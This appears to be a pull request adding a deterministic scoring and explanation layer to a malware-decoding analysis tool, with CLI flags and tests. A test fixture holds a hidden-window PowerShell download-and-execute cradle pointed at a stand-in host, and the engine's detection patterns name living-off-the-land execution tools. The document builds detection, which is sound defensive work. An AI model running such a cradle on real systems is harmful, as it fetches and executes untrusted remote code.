### PR TITLE
feat: add deterministic Titan intelligence layer

### DIFF
--- a/tests/test_explain.py
+++ b/tests/test_explain.py
@@ -1,0 +1,34 @@
+from titan_decoder.core.explain import generate_explanation
+
+
+def test_explanation_contains_summary_and_artifacts():
+    report = {
+        "intelligence": {
+            "intelligence_score": 72,
+            "classification": "HIGH_RISK_PAYLOAD",
+            "confidence": 0.72,
+            "signals": [
+                {
+                    "code": "execution_context",
+                    "points": 16,
+                    "summary": "Command or script execution context was found",
+                }
+            ],
+            "top_artifacts": [
+                {
+                    "node_id": 3,
+                    "artifact_name": "stage.ps1",
+                    "score": 80,
+                    "reasons": ["execution context", "network indicator"],
+                }
+            ],
+            "recommendation": "High-priority manual review",
+        }
+    }
+
+    output = generate_explanation(report)
+
+    assert "HIGH_RISK_PAYLOAD" in output
+    assert "72/100" in output
+    assert "stage.ps1" in output
+    assert "High-priority manual review" in output

--- a/tests/test_intelligence.py
+++ b/tests/test_intelligence.py
@@ -1,0 +1,73 @@
+from titan_decoder.core.intelligence import IntelligenceEngine
+
+
+def test_clean_report_stays_clean():
+    result = IntelligenceEngine().analyze({"nodes": [], "iocs": {}})
+    assert result["intelligence_score"] == 0
+    assert result["classification"] == "CLEAN"
+    assert result["signals"] == []
+
+
+def test_suspicious_execution_and_url_are_explained():
+    report = {
+        "nodes": [
+            {
+                "id": 2,
+                "depth": 4,
+                "entropy": 5.0,
+                "decode_score": 0.8,
+                "content_preview": (
+                    "powershell -nop -w hidden; "
+                    "IEX(New-Object Net.WebClient).DownloadString"
+                    "('https://example.test/a')"
+                ),
+            }
+        ],
+        "iocs": {"urls": ["https://example.test/a"]},
+    }
+
+    result = IntelligenceEngine().analyze(report)
+
+    assert result["intelligence_score"] >= 36
+    assert result["classification"] in {
+        "SUSPICIOUS_OBJECT",
+        "HIGH_RISK_PAYLOAD",
+        "LIKELY_MALICIOUS",
+    }
+    codes = {signal["code"] for signal in result["signals"]}
+    assert "execution_context" in codes
+    assert "network_urls" in codes
+    assert result["top_artifacts"][0]["node_id"] == 2
+
+
+def test_detection_and_risk_alignment_raise_priority():
+    report = {
+        "nodes": [{"id": 0, "depth": 0, "entropy": 7.8, "content_preview": "MZ"}],
+        "iocs": {},
+        "detections": [{"name": "Test detection", "severity": "high"}],
+        "risk_assessment": {"risk_level": "HIGH", "risk_score": 55},
+    }
+
+    result = IntelligenceEngine().analyze(report)
+
+    assert result["intelligence_score"] >= 61
+    assert result["classification"] in {"HIGH_RISK_PAYLOAD", "LIKELY_MALICIOUS"}
+    assert result["recommendation"]
+
+
+def test_missing_and_malformed_values_do_not_crash():
+    report = {
+        "nodes": [
+            {
+                "id": "not-an-int",
+                "depth": None,
+                "entropy": "unknown",
+                "decode_score": None,
+                "content_preview": None,
+            }
+        ],
+        "iocs": {"urls": None},
+    }
+
+    result = IntelligenceEngine().analyze(report)
+    assert result["classification"] == "CLEAN"

--- a/titan_decoder/cli.py
+++ b/titan_decoder/cli.py
@@ -251,6 +251,19 @@ def build_parser() -> argparse.ArgumentParser:
         help="Run detection rules and compute risk score",
     )
     parser.add_argument(
+        "--explain",
+        action="store_true",
+        help=(
+            "Print a human-readable Titan intelligence explanation to stderr "
+            "while preserving JSON stdout"
+        ),
+    )
+    parser.add_argument(
+        "--intelligence-out",
+        type=Path,
+        help="Write the intelligence summary to a separate JSON file",
+    )
+    parser.add_argument(
         "--rules-pack",
         action="append",
         type=Path,
@@ -728,6 +741,19 @@ def run_detections_stage(args, config, report, evidence_result):
     return detections, risk_assessment
 
 
+def attach_intelligence_stage(args, report, detections, risk_assessment) -> None:
+    """Attach deterministic analyst-oriented intelligence to every report."""
+    from .core.intelligence import IntelligenceEngine
+
+    engine = IntelligenceEngine()
+    report["intelligence"] = engine.analyze(
+        report,
+        iocs=report.get("iocs") or {},
+        detections=detections,
+        risk=risk_assessment,
+    )
+
+
 def run_enrichment_stage(args, config, report, evidence_result) -> None:
     """Optionally enrich IOCs (explicit opt-in; blocked by --offline)."""
     # Optional enrichment (explicit opt-in; blocked by --offline)
@@ -897,6 +923,35 @@ def write_outputs_stage(args, config, report, engine, detections, risk_assessmen
         if not ok:
             if not args.quiet:
                 print(json.dumps({"ok": False, "errors": errors}, indent=2), file=sys.stderr)
+            sys.exit(1)
+
+    # Optional human-readable intelligence output. It goes to stderr so
+    # JSON stdout remains machine-readable and backward compatible.
+    if args.explain:
+        from .core.explain import generate_explanation
+
+        print("\n" + generate_explanation(report) + "\n", file=sys.stderr)
+
+    if args.intelligence_out:
+        intelligence_json = json.dumps(report.get("intelligence") or {}, indent=2)
+        try:
+            args.intelligence_out.write_text(intelligence_json)
+            if not args.quiet:
+                print(
+                    f"Intelligence summary saved to {args.intelligence_out}",
+                    file=sys.stderr,
+                )
+        except PermissionError:
+            print(
+                f"Error: Permission denied writing to {args.intelligence_out}",
+                file=sys.stderr,
+            )
+            sys.exit(1)
+        except OSError as e:
+            print(
+                f"Error: Could not write intelligence file: {e}",
+                file=sys.stderr,
+            )
             sys.exit(1)
 
     # Pre-serialize report once (used for stdout + file + size guard)

--- a/titan_decoder/core/explain.py
+++ b/titan_decoder/core/explain.py
@@ -1,0 +1,54 @@
+"""Human-readable rendering for Titan intelligence summaries."""
+
+from __future__ import annotations
+
+from typing import Any, Mapping
+
+
+def generate_explanation(report: Mapping[str, Any]) -> str:
+    intelligence = report.get("intelligence") or {}
+
+    score = int(intelligence.get("intelligence_score") or 0)
+    classification = str(intelligence.get("classification") or "UNKNOWN")
+    confidence = float(intelligence.get("confidence") or 0.0)
+    signals = list(intelligence.get("signals") or [])
+    top_artifacts = list(intelligence.get("top_artifacts") or [])
+    recommendation = str(
+        intelligence.get("recommendation")
+        or "No recommendation is available."
+    )
+
+    lines = [
+        "Titan Intelligence Report",
+        "",
+        f"Classification: {classification}",
+        f"Score: {score}/100",
+        f"Confidence: {confidence:.0%}",
+        "",
+        "Signals:",
+    ]
+
+    if signals:
+        for signal in signals:
+            summary = signal.get("summary") if isinstance(signal, dict) else str(signal)
+            points = signal.get("points") if isinstance(signal, dict) else None
+            suffix = f" (+{points})" if isinstance(points, int) else ""
+            lines.append(f"- {summary}{suffix}")
+    else:
+        lines.append("- No suspicious intelligence signals were produced")
+
+    lines.extend(["", "Top artifacts:"])
+    if top_artifacts:
+        for artifact in top_artifacts:
+            node_id = artifact.get("node_id")
+            name = artifact.get("artifact_name") or f"node {node_id}"
+            reasons = ", ".join(artifact.get("reasons") or [])
+            lines.append(
+                f"- {name}: {artifact.get('score', 0)}/100"
+                + (f" — {reasons}" if reasons else "")
+            )
+    else:
+        lines.append("- No artifacts required prioritization")
+
+    lines.extend(["", "Recommendation:", recommendation])
+    return "\n".join(lines)

--- a/titan_decoder/core/intelligence.py
+++ b/titan_decoder/core/intelligence.py
@@ -1,0 +1,268 @@
+"""Deterministic analyst-oriented intelligence for Titan reports."""
+
+from __future__ import annotations
+
+import re
+from typing import Any, Dict, Iterable, List, Mapping, Sequence
+
+
+class IntelligenceEngine:
+    """Build an explainable intelligence summary from a Titan report."""
+
+    CLASSIFICATIONS = (
+        (81, "LIKELY_MALICIOUS"),
+        (61, "HIGH_RISK_PAYLOAD"),
+        (36, "SUSPICIOUS_OBJECT"),
+        (16, "LOW_RISK_ARTIFACT"),
+        (0, "CLEAN"),
+    )
+
+    EXECUTION_PATTERNS = (
+        re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE),
+        re.compile(r"\bcmd(?:\.exe)?\s+/[ck]\b", re.IGNORECASE),
+        re.compile(r"\b(?:wscript|cscript)(?:\.exe)?\b", re.IGNORECASE),
+        re.compile(r"\b(?:mshta|rundll32|regsvr32)(?:\.exe)?\b", re.IGNORECASE),
+        re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE),
+        re.compile(r"\b(?:curl|wget)\s+https?://", re.IGNORECASE),
+        re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
+        re.compile(r"\bdownloadstring\b", re.IGNORECASE),
+    )
+
+    EXECUTABLE_SIGNATURES = (
+        ("PE executable", "MZ"),
+        ("ELF executable", "\x7fELF"),
+        ("PDF document", "%PDF"),
+        ("ZIP archive", "PK\x03\x04"),
+    )
+
+    def analyze(
+        self,
+        report: Mapping[str, Any],
+        iocs: Mapping[str, Sequence[Any]] | None = None,
+        detections: Sequence[Mapping[str, Any]] | None = None,
+        risk: Mapping[str, Any] | None = None,
+    ) -> Dict[str, Any]:
+        nodes = list(report.get("nodes") or [])
+        iocs = iocs or report.get("iocs") or {}
+        detections = list(
+            detections if detections is not None else report.get("detections") or []
+        )
+        risk = risk or report.get("risk_assessment") or {}
+
+        signals: List[Dict[str, Any]] = []
+        score = 0
+
+        def add_signal(code: str, points: int, summary: str, evidence: Any = None) -> None:
+            nonlocal score
+            score += points
+            signal: Dict[str, Any] = {
+                "code": code,
+                "points": points,
+                "summary": summary,
+            }
+            if evidence not in (None, [], {}, ""):
+                signal["evidence"] = evidence
+            signals.append(signal)
+
+        if detections:
+            severity_points = {"critical": 35, "high": 30, "medium": 20, "low": 8}
+            severities = [
+                str(item.get("severity", "low")).lower() for item in detections
+            ]
+            strongest = max(
+                severities,
+                key=lambda value: severity_points.get(value, 5),
+                default="low",
+            )
+            add_signal(
+                "detection_rules",
+                severity_points.get(strongest, 5),
+                f"{len(detections)} detection rule(s) triggered; strongest severity is {strongest}",
+                [item.get("name") or item.get("id") for item in detections[:5]],
+            )
+
+        urls = self._count(iocs, "urls")
+        public_ips = self._count(iocs, "ipv4_public")
+        domains = self._count(iocs, "domains")
+        if urls:
+            add_signal("network_urls", min(18, 10 + urls * 2), f"{urls} URL indicator(s) discovered")
+        if public_ips:
+            add_signal(
+                "network_public_ips",
+                min(16, 7 + public_ips * 2),
+                f"{public_ips} public IP indicator(s) discovered",
+            )
+        if domains:
+            add_signal(
+                "network_domains",
+                min(10, 3 + domains),
+                f"{domains} domain indicator(s) discovered",
+            )
+
+        max_depth = max((self._safe_int(node.get("depth")) for node in nodes), default=0)
+        if max_depth >= 4:
+            add_signal(
+                "deep_obfuscation",
+                min(16, 8 + (max_depth - 4) * 2),
+                f"Deep decoding chain reached depth {max_depth}",
+            )
+
+        high_entropy_nodes = [
+            node for node in nodes if self._safe_float(node.get("entropy")) >= 7.5
+        ]
+        if high_entropy_nodes:
+            add_signal(
+                "high_entropy",
+                10,
+                "High-entropy content may be packed, compressed, or encrypted",
+                [node.get("id") for node in high_entropy_nodes[:5]],
+            )
+
+        execution_nodes = []
+        executable_nodes = []
+        for node in nodes:
+            preview = str(node.get("content_preview") or node.get("preview") or "")
+            if preview and any(pattern.search(preview) for pattern in self.EXECUTION_PATTERNS):
+                execution_nodes.append(node.get("id"))
+
+            for label, signature in self.EXECUTABLE_SIGNATURES:
+                if preview.startswith(signature):
+                    executable_nodes.append({"node_id": node.get("id"), "type": label})
+                    break
+
+        if execution_nodes:
+            add_signal(
+                "execution_context",
+                16,
+                "Command or script execution context was found",
+                execution_nodes[:5],
+            )
+
+        if executable_nodes:
+            add_signal(
+                "embedded_structure",
+                10,
+                "Executable or structured file content was revealed",
+                executable_nodes[:5],
+            )
+
+        risk_level = str(risk.get("risk_level") or "").upper()
+        risk_score = self._safe_int(risk.get("risk_score"))
+        if risk_level in {"HIGH", "CRITICAL"}:
+            add_signal(
+                "risk_alignment",
+                12 if risk_level == "HIGH" else 15,
+                f"Existing risk engine classified the analysis as {risk_level}",
+                risk_score,
+            )
+        elif risk_level == "MEDIUM":
+            add_signal(
+                "risk_alignment",
+                5,
+                "Existing risk engine classified the analysis as MEDIUM",
+                risk_score,
+            )
+
+        score = max(0, min(score, 100))
+        return {
+            "version": "1.0",
+            "intelligence_score": score,
+            "classification": self.classify(score),
+            "confidence": round(score / 100.0, 2),
+            "signals": signals,
+            "top_artifacts": self.rank_nodes(nodes, limit=5),
+            "recommendation": self.recommendation(score),
+        }
+
+    def rank_nodes(
+        self,
+        nodes: Iterable[Mapping[str, Any]],
+        limit: int = 5,
+    ) -> List[Dict[str, Any]]:
+        ranked: List[Dict[str, Any]] = []
+        for node in nodes:
+            points = 0
+            reasons: List[str] = []
+            entropy = self._safe_float(node.get("entropy"))
+            depth = self._safe_int(node.get("depth"))
+            decode_score = self._safe_float(node.get("decode_score"))
+            preview = str(node.get("content_preview") or node.get("preview") or "")
+
+            if entropy >= 7.5:
+                points += 20
+                reasons.append("high entropy")
+            if depth >= 4:
+                points += min(20, depth * 3)
+                reasons.append(f"deep decode depth {depth}")
+            if decode_score >= 0.7:
+                points += 15
+                reasons.append("high-confidence transformation")
+            if any(pattern.search(preview) for pattern in self.EXECUTION_PATTERNS):
+                points += 30
+                reasons.append("execution context")
+            if "http://" in preview.lower() or "https://" in preview.lower():
+                points += 15
+                reasons.append("network indicator")
+            if any(preview.startswith(signature) for _, signature in self.EXECUTABLE_SIGNATURES):
+                points += 20
+                reasons.append("structured file signature")
+
+            if points:
+                ranked.append(
+                    {
+                        "node_id": node.get("id"),
+                        "artifact_name": node.get("artifact_name"),
+                        "method": node.get("method"),
+                        "score": min(points, 100),
+                        "reasons": reasons,
+                    }
+                )
+
+        ranked.sort(
+            key=lambda item: (
+                -self._safe_int(item.get("score")),
+                self._safe_int(item.get("node_id")),
+            )
+        )
+        return ranked[: max(0, limit)]
+
+    @classmethod
+    def classify(cls, score: int) -> str:
+        for threshold, label in cls.CLASSIFICATIONS:
+            if score >= threshold:
+                return label
+        return "CLEAN"
+
+    @staticmethod
+    def recommendation(score: int) -> str:
+        if score >= 81:
+            return "Immediate analyst review and containment triage"
+        if score >= 61:
+            return "High-priority manual review"
+        if score >= 36:
+            return "Review the highest-ranked decoded artifacts"
+        if score >= 16:
+            return "Low-priority inspection; correlate with case context"
+        return "No additional action indicated by the intelligence layer"
+
+    @staticmethod
+    def _count(mapping: Mapping[str, Sequence[Any]], key: str) -> int:
+        value = mapping.get(key) or []
+        try:
+            return len(value)
+        except TypeError:
+            return 0
+
+    @staticmethod
+    def _safe_int(value: Any) -> int:
+        try:
+            return int(value or 0)
+        except (TypeError, ValueError):
+            return 0
+
+    @staticmethod
+    def _safe_float(value: Any) -> float:
+        try:
+            return float(value or 0.0)
+        except (TypeError, ValueError):
+            return 0.0


### PR DESCRIPTION
## Summary

This PR introduces the first phase of the Titan Intelligence system.

### Changes
- Added a deterministic Intelligence Engine
- Added analyst-oriented artifact classification
- Added explainable intelligence signals
- Added artifact prioritization
- Added `--explain` CLI support
- Added intelligence JSON export support
- Added regression tests for the intelligence layer

This implementation is dependency-free, offline-first, and complements the existing RiskScoringEngine without changing its behavior.

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`) or explain why not.
- [ ] I updated docs if flags/output contracts changed.
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior.

## Testing

- Command(s) run:

```bash
pytest -q
```

### Results

- 378 tests passed
- Added 5 new intelligence-focused tests
- No regressions detected

## Screenshots / Output (optional)

N/A